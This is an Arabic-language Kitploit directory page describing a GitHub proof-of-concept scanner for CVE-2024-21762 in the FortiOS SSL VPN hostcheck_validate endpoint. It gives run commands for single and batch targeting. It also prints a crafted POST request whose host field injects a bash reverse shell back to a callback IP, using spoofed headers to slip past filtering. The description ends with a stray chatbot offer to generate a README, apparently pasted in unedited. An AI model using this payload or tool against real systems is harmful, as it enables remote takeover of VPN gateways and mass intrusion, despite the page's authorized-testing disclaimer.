Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-21762_FortiNet_PoC — ماسح ضوئي لإثبات المفهوم يستهدف CVE-2024-21762 في نقطة نهاية /remote/hostcheck_validate الخاصة بـ FortiOS SSL VPN، مع تسليم حمولة صدفة عكسية. | Kitploit
أدوات/GitHubGitHub/abrewer251/cve-2024-21762_fortinet_poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubabrewer251/cve-2024-21762_fortinet_poc

CVE-2024-21762_FortiNet_PoC

ماسح ضوئي لإثبات المفهوم يستهدف CVE-2024-21762 في نقطة نهاية /remote/hostcheck_validate الخاصة بـ FortiOS SSL VPN، مع تسليم حمولة صدفة عكسية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
213منذ سنة واحدةلم تتم المراجعة بعد
مشاركة

CVE-2024-21762_FortiNet_PoC

ماسح ضوئي لإثبات المفهوم (PoC) يستهدف CVE-2024-21762 في نقطة نهاية /remote/hostcheck_validate الخاصة بـ FortiOS SSL VPN مع تسليم حمولة قشرة عكسية (reverse shell).

إليك وصف GitHub لمشروعك، بما في ذلك ملخص نظيف وموجز، ودليل استخدام، وسياق حول كيفية توافقه مع الثغرة الأمنية.


🔥 عنوان المشروع: CVE-2024-21762 FortiOS HostCheck PoC Scanner

🧠 الملخص (لسطر وصف GitHub):

ماسح ضوئي لإثبات المفهوم يستهدف CVE-2024-21762 في نقطة نهاية /remote/hostcheck_validate الخاصة بـ FortiOS SSL VPN مع تسليم حمولة قشرة عكسية (reverse shell).


📜 نظرة عامة

هذا السكربت بلغة Python هو أداة إثبات مفهوم (PoC) مصممة للتفاعل مع واجهة FortiOS SSL VPN من Fortinet، مستهدفةً CVE-2024-21762 — وهي ثغرة تجاوز سعة المخزن المؤقت (stack-based buffer overflow) أو حقن أوامر في نقطة النهاية /remote/hostcheck_validate.

إخلاء مسؤولية: هذا مخصص لأغراض التعليم والاختبار المصرح به فقط.


🧬 كيف يعمل

  • يرسل طلب POST مُعدًّا إلى /remote/hostcheck_validate على واجهة FortiGate SSL VPN.
  • يحقن حمولة قشرة عكسية بلغة bash في معامل ضعيف محاكى (host).
  • يستخدم ترويسات مزيفة (User-Agent, Cookie) لتجاوز التصفية السطحية لطلبات FortiOS.
  • يستقبل ويُسجّل استجابات الخادم لتقييم نجاح الاستغلال.
  • يدعم اختبار الأهداف الفردية أو الدفعية مع أتمتة إدخال/إخراج الملفات وأشرطة التقدم.

🛠️ الميزات

  • 🧪 حقن حمولة قشرة عكسية عبر حقل نموذج مُتحكَّم فيه
  • 🧾 التقاط كامل لاستجابة HTTP للتحليل (last_response.txt)
  • 📊 شريط تقدم لتتبع الوضع الفردي/الدفعي
  • 🗃️ وضع الدفعات مع دعم ملفات الإدخال/الإخراج
  • 🔄 نمطي وقابل للتوسعة

⚙️ المتطلبات

  • Python 3.6+
  • tqdm لعرض التقدم

تثبيت التبعيات:

pip install tqdm

🚀 الاستخدام

وضع الهدف الفردي

python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080

وضع الدفعات

python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
  • targets.txt: قائمة بالأهداف بصيغة IP:PORT، هدف واحد في كل سطر
  • results.txt: سجل إخراج لمحاولات الاستغلال

📥 مثال على الحمولة المُرسلة

POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...

🔍 السجلات

تكتب الأداة الاستجابة الكاملة لكل محاولة إلى:

last_response.txt

استخدم هذا للتحقق مما إذا كان الطلب قد تم تحليله أو رفضه أو إذا تم إرجاع رمز خطأ.


⚠️ قانوني

هذا الكود مُقدَّم لأغراض التعليم والاختبار المصرح به فقط. لا تستخدمه على شبكات أو أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.


✍️ المؤلف

Carter — مهندس أمن سيبراني، متحمس لفِرق Red/Purple، ومهووس بأتمتة إثباتات المفهوم.


هل تريد أن يتم تجهيز هذا كملف README.md + هيكل مستودع جاهز للرفع إلى GitHub؟ يمكنني توليد ذلك بعد ذلك.

تنزيل الأداة